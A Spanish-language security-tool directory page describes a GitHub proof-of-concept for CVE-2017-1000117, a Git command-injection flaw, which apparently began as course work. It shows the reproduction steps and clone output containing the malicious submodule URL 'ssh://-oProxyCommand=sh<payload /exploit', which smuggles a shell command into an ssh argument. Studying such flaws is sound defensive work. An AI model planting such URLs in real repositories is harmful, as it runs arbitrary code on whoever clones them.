Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-1000117 — CVE-2017-1000117 reproducción de vulnerabilidad (PoC+Exp) | Kitploit
Herramientas/GitHubGitHub/anonymking/cve-2017-1000117
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubanonymking/cve-2017-1000117

CVE-2017-1000117

CVE-2017-1000117 reproducción de vulnerabilidad (PoC+Exp)

Ver Repositorio
321hace 7 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2017-1000117

Descripción del proyecto

  • Uno de los temas seleccionados para el diseño del curso de seguridad en redes.
  • Reproducción de la vulnerabilidad CVE-2017-1000117 (PoC+Exp)
  • Git + SSH

Resumen de la vulnerabilidad:

  • Nombre de la vulnerabilidad: Vulnerabilidad de inyección de comandos Git
  • ID CNNVD: CNNVD-201708-670
  • Nivel de peligro: Medio
  • ID CVE: CVE-2017-1000117
  • Tipo de vulnerabilidad: Inyección de comandos
  • Fecha de publicación: 2017-08-16
  • Tipo de amenaza: Remota
  • Fecha de actualización: 2017-10-17
  • Proveedor: git-scm
  • Fuente de la vulnerabilidad: TrevorJay
  • Resumen: Git es un sistema de control de versiones distribuido gratuito y de código abierto desarrollado por el desarrollador de software estadounidense Linus Torvalds. Existe una vulnerabilidad de comandos en versiones anteriores a Git 2.7.5. Los atacantes remotos pueden explotar esta vulnerabilidad mediante una URL especialmente diseñada 'ssh://...' para ejecutar programas arbitrarios en el dispositivo remoto.

Proceso de explotación

  • Instalar una versión de Git dentro del rango de la vulnerabilidad (Git para Linux), Git para Windows)
  • Aquí elegí la versión git-2.12.1 (probada en Linux y Windows, ambas funcionales) (Las direcciones de descarga para la versión 2.12.1 en Linux y Windows son respectivamente git-2.12.1.tar.gz, Git-2.12.1-64-bit.tar.bz2)
  • Una vez instalado Git, clone el proyecto incluyendo los submódulos: git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
  • root@kitploit:~
    $ git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
    Cloning into 'CVE-2017-1000117'...
    remote: Enumerating objects: 14, done.
    remote: Counting objects: 100% (14/14), done.
    remote: Compressing objects: 100% (13/13), done.
    remote: Total 14 (delta 3), reused 8 (delta 0), pack-reused 0
    Unpacking objects: 100% (14/14), done.
    Submodule 'exploit' (ssh://-oProxyCommand=sh<payload /exploit) registered for path 'exploit'
    Cloning into 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit'...
    Pseudo-terminal will not be allocated because stdin is not a terminal.
    
    
    *********************************************
                       _ooOoo_
                      o8888888o
                      88" . "88
                      (| -_- |)
                      O\  =  /O
                   ____/`---'\____
                 .'  \\|     |//  `.
                /  \\|||  :  |||//  \
               /  _||||| -:- |||||-  \
               |   | \\\  -  /// |   |
               | \_|  ''\---/''  |   |
               \  .-\__  `-`  ___/-. /
             ___`. .'  /--.--\  `. . __
          ."" '&lt;  `.___\_&lt;|>_/___.'  >'"".
         | | :  `- \`.;`\ _ /`;.`/ - ` : | |
         \  \ `-.   \_ __\ /__ _/   .-` /  /
    ======`-.____`-.___\_____/___.-`____.-'======
                       `=---='
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    
    ssh_exchange_identification: Connection closed by remote host
    fatal: Could not read from remote repository.
    
    Please make sure you have the correct access rights
    and the repository exists.
    fatal: clone of 'ssh://-oProxyCommand=sh<payload /exploit' into submodule path 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit' failed
    Failed to clone 'exploit'. Retry scheduled
    
    • Cuando veas al Buda, la vulnerabilidad ya ha sido reproducida, y el código malicioso en el payload se ha ejecutado con éxito.

    Actualización 2019/06/21 10:30

    • Al escribir el informe, de repente descubrí que esta vulnerabilidad es muy similar a CVE-2018-17456, solo que expresada de otra manera; ambas tienen su origen en la incapacidad de analizar correctamente el símbolo "-", interpretándolo erróneamente como un parámetro, lo que provoca la ejecución de código arbitrario.
    • Sobre la explotación de la vulnerabilidad CVE-2018-17456, se puede consultar este artículo: [《Análisis de la vulnerabilidad de Git Submodule (CVE-2018-17456)》](https://paper.seebug.org/716/](https://paper.seebug.org/716/)

    Actualización 2019/06/21 19:39

    • Al buscar información relacionada, encontré una vulnerabilidad muy similar CVE-2018-11235.
    • Sobre la vulnerabilidad CVE-2018-11235, aquí hay algunos artículos de referencia: RCE de git CVE-2018-11235, Exploit PoC para CVE-2018-11235, Análisis detallado de la vulnerabilidad de ejecución remota de código en Git (CVE-2018-11235)
    Descargar herramienta